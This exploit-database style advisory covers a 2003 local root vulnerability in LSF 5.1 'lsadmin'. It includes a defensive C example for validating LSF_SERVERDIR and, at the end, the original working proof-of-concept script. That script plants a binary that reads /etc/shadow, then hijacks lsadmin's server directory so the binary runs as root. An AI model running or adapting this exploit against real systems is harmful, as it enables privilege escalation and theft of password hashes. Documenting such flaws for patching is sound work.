Vendor: Load Sharing Facility
By: CADENCE of Lam3rZ
CVSS: 7.2 (HIGH)
Improper Handling of Input in Environment Variables
CWE: 20
Product Name: Load Sharing Facility
Affected Version From: LSF 5.1
Affected Version To: LSF 5.1
Patch Exists: YES
Related CWE: N/A
CPE: a:platform_computing:load_sharing_facility:5.1
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2003

LSF 5.1 ‘lsadmin’ local root exploit

It has been reported that Load Sharing Facility (LSF) does not properly handle input in environment variables. Because of this, an attacker may be able to gain escalated privileges on a vulnerable system. Proof-of-concept code is provided that creates a file containing the contents of the /etc/shadow file, which the attacker can then read.

Mitigation:

Ensure that environment variables are properly sanitized and validated before use.
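
As an added example (not part of the original advisory and not the vendor's code), this C code shows how a set-uid program could vet a directory taken from a variable such as LSF_SERVERDIR, which the proof of concept on this page sets to the current directory before running lsadmin. The caller's value is ignored when the process is privileged, and otherwise accepted only if it is an absolute path whose every component is a root-owned directory not writable by group or others. The function names and the DEFAULT_SERVERDIR path are assumptions made for illustration.

```c
#define _XOPEN_SOURCE 700
#include <limits.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <sys/stat.h>
#include <unistd.h>

/* Hypothetical compiled-in default; the real install path is not on this page. */
#define DEFAULT_SERVERDIR "/opt/lsf/etc"

/* Policy for one path component: root-owned directory, no group/other write. */
int owner_mode_is_trusted(uid_t owner, mode_t mode)
{
    return S_ISDIR(mode) && owner == 0 && (mode & (S_IWGRP | S_IWOTH)) == 0;
}

/* Absolute path whose every component, from "/" down, passes the policy,
 * so no unprivileged user can replace a component after the check. */
int path_is_trusted(const char *dir)
{
    char buf[PATH_MAX];
    struct stat st;
    size_t i, len = dir ? strlen(dir) : 0;

    if (len == 0 || dir[0] != '/' || len >= sizeof buf)
        return 0;                       /* rejects NULL, "", "." and relative paths */
    for (i = 0; i < len; i++) {
        if (dir[i] != '/' && i + 1 != len)
            continue;                   /* not at a component boundary */
        memcpy(buf, dir, i + 1);        /* prefix: "/", "/opt/", "/opt/lsf/", ... */
        buf[i + 1] = '\0';
        if (stat(buf, &st) != 0 || !owner_mode_is_trusted(st.st_uid, st.st_mode))
            return 0;
    }
    return 1;
}

/* A set-uid/set-gid process ignores the caller's value outright. */
const char *choose_serverdir(const char *env_value, int privileged)
{
    if (!privileged && path_is_trusted(env_value))
        return env_value;
    return DEFAULT_SERVERDIR;
}

int main(void)
{
    int privileged = getuid() != geteuid() || getgid() != getegid();
    printf("%s\n", choose_serverdir(getenv("LSF_SERVERDIR"), privileged));
}
```

Run with LSF_SERVERDIR=. it prints the compiled-in default, because a relative path never passes the check.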
Exploit-DB raw data:

source: https://www.securityfocus.com/bid/7655/info

It has been reported that Load Sharing Facility (LSF) does not properly handle input in environment variables. Because of this, an attacker may be able to gain escalated privileges on a vulnerable system. 

# LSF 5.1 'lsadmin' local root exploit
# 2003.03.20 - CADENCE of Lam3rZ

# Proof of concept - for educational purposes only!

cat <<__END__> attacker_code.c
#include <stdio.h>
int main() {
FILE *secret_file;
FILE *temp_file;
char one_line[128];
setuid(0);setgid(0);
secret_file = fopen("/etc/shadow", "r");
temp_file = fopen(".temp.file", "w");
fgets(one_line, 120, secret_file);
fputs(one_line, temp_file);
fclose(secret_file); fclose (temp_file);
}
__END__

gcc attacker_code.c -o lim
chmod 777 lim
export LSF_SERVERDIR=.
lsadmin ckconfig
cat .temp.file
rm -f attacker_code.c lim .temp.file